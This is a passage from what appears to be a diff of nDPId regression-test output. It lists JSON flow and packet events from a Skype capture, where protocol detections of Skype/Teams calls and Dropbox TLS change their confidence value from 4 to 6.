{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659480,"flow_last_seen":1431970659480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431970659480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659480,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaDxAAEAGUyXAqAEib91Nr8gyAbuh2H3fAAAAALAC\/\/+ohwAAAgQFtAEDAwUBAQgKPjHnRwAAAAAEAgAA"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPbBAAEAG45PAqAEiQAQXpsgznF2bjnkgAAAAALAC\/\/99bQAAAgQFtAEDAwUBAQgKPjHoqQAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1elAAAEARHtbAqAEinTeCkDLdnFAAIfN1e0UCt0zo\/WrZ+Zw8Ki6+SR8vgG1TLjatCw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/fyEAAEARaHbAqAEinTg0FDLdnGEAK5aLe0cCmWiuCofYyBz6GXTZdvI4LweQLKgxsl8j0KcXdBMS+c8="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAABBTDEAAEAR4+jAqAEinTfrkDLdnGAALTL8e0kC17QicxuXB5auWkNIni8RcFzpWBK6wb+NIPIUjtvt0ICuYw=="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+n20AAEARW\/XAqAEib91NpTLdnEQAKqfKe0sCA3KviLJG1lAzDVoG9idWXcbF4pfswWYweShFk+5UVw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA71A4AAEARxQ\/AqAEinTeCkjLdnGEAJ5FDe00CRUi6WS8h8mPi8e9oMy1XIZqCitDbn3NkpyCi9w=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1431970659837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970659837,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIgG7yDJl2k5Wodh94KASOJCbeAAAAgQFrAQCCApNo+OiPjHnRwEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1431970659837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970659837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vZ1AAEAG\/c\/AqAEib91Nr8gyAbuh2H3gZdpOV4AQECzxPQAAAQEICj4x6KxNo+Oi"} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431970660037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970660037,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxdyDOxwWA5m455IaASOJAGLQAAAgQFrAQCCApMQvFqPjHoqQEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431970660037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660037,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0G21AAEAGBePAqAEiQAQXpsgznF2bjnkhscFgOoAQECxcjQAAAQEICj4x6XNMQvFq"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431970660159,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJkcJAADIG5BVsoKNswKgBIgG7yBaV3SxsiZUqrIAYACaXjgAAAQEICmGAz38+MVp4FwMBARB8Fy4qyreLjg5Q96tDDF\/tJNQpsIShBClYLxny\/F4IVS87inYaH8NMzidehO4QJLb0Gpm5qZy83nu17ekToUXtOsjvJgerL5AdcFL4wkOs5YWIZJQILj89EVd3kwm2gSreMO6fU0x3sDxMFrXZesIKTvERW3z9QiBmYf77CRAcaBKDIZ4h8M6jvsMWFjh8rbcU6C9Yz3364yiyHbQuoqtvQN4EQD7H\/ZMlnDFOtnG2H8aPUdqUMD5HAjMSCpEQqc4JKy0wVFFuLxpIEra0u2hVB7ftMdJLJ\/sq+RNwy1Sfuv0g7qCHweCB0CkHYTzB2\/cU6qQOlFTex1tRE+sh29iBulHeN2MmenT9xvrZggKZYQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660159,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/qVAAEAGakfAqAEibKCjbMgWAbuJlSqsld0tgYAQD\/f6XgAAAQEICj4x6exhgM9\/"} 
01771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1431970660162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431970660162,"pkt":"0NQSxnP1PBXCt3IOCABFAAPuXRVAAEAGCB7AqAEibKCjbMgWAbuJlSqsld0tgYAYEABN6wAAAQEICj4x6e5hgM9\/FwMBACBZ+Bs2C0RS\/3DQyGZlP7ulpgg75GP5qHQjRGtchozZwxcDAQOQsZo+mdYHDHNhryD2tBwTy4NvJ6ZcB90CLvDuO3oQpA0NMcbrVNY5NoFZnnz0+pHYPlsxDiwS7sQ7DD24qzDLtHgUUDp9pF8b6+msIHWzLPEMF8+q7Hjw2nVwpow1oTrrramWFNK3HRWRwVplTmpzcS1pGJ+gQZaUVDp8kdn+ynK0M3\/CdKLtFbx\/CK0N6q8IWYmbmyMU5F09Bl18WwyIuujJA\/tFE5EWnSsW2X+zhBTRq9ZI\/U83NB7qUlABm1QnhF8bT1juNjzO0mWZlZFkQTsnKvttlKSdtcMJ5dRpAqaA7SHB9Yz5a49nYhRO+wwnisVOiZGDLnrE+5oMmTb9C9ZKB5wr20bAzzEkorS06bd9G1Av+Y\/0Lf00cKMeFW4\/NlQQW2HF8cVYvIZB6\/NQlnUH0R\/vBxkZqKxj1qnAgjVDBnssNNPdbIKrHQdoBZOJ1oafA1nh+V4oZbi2LQd\/E9fD9yqlUtsVwzp7nZEacc3p6m0hUW7kAV1Xt3xzsImKJZZ7j62VNDmcm6WWPL29PEP1oF9dSb1pTuKLUUHMDB7w2YxBjm\/ZP6TnMxz3NjZHO6QfscWBsVMMmj8RnOruQ3QLIGDLGpDyMgBlDBTqoOiUC8PgBmSlGAPlhRVT95WOL1mqA6t0DBes+DH8fSZeIVvA3K7YCF4kypftCQiLFXrErN2XOvSvejhBSuUJcdOOdCNOjGoPoLOWoqVEN7LXgsXaWfdoBTx79TQIPG1as39Z7fRVj+fkKyD61xYiyqgtf1\/WpWVrCyTwKovWQ0C6GFD907jbLAxlD1UmA3abuFNLCt\/acdLUjndrKvuooQD6IYCIwrJi8YL7kKb0+32ovATeOhPAdbLgWa9wSUgKddlog7emY+Y\/Esr+n4M8E4bdevnoTb75M4ozaSVREGSwce5U3XhhEIMmQQkznZpj46Kf9jFwDbzxK7wZgQZ21paket5\/tiCE9zIgnjVS0wcx5TiuHX4egIJeH+3peLDINK2jmmDw6Tm7kJ69c9scP9Gd7zhw6XHG1S0IW6aTMTHKdqb5u2V1sEk8osIRYPNxQKLPY35nEHSqNlCZVyRPLhgWH+JjqVOEwNbhNBOOCigDYop+TfjfQDQrLH+IrQWISQBJnU69BfsNuFeEx3PLuH6o+oBZH+QNZRQR6lheial\/vXPOSCwP4oQlK11s+sl5+hhICPKCRXfAUncH7wDdsLSe"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6TMEAAEARsjLAqAEib91KGDLdnGAAJk69e08C7Jn\/msaru979SjBYNnh0LMk7Ko\/+l6KrptIV"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 